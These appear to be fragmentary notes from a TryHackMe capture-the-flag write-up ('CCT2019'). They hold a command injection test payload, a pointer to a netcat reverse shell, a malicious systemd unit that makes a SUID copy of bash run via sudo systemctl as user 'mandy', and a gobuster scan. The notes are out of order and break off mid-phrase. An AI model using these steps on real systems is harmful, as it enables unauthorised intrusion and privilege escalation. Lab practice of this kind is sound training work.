CCT2019 TryHackMe -
127.0.0.1; id

If you see the output of the id command, the injection works. Use a netcat reverse shell one-liner.
[Unit]
Description=Privilege escalation

[Service]
Type=simple
User=mandy
ExecStart=/bin/bash -c 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash'

[Install]
WantedBy=multi-user.target

sudo -u mandy /bin/systemctl link /home/www-data/privesc.service
sudo -u mandy /bin/systemctl start privesc.service

Now /tmp/bash is a SUID binary.

/tmp/bash -p

Now you are mandy.

gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirb/common.txt

or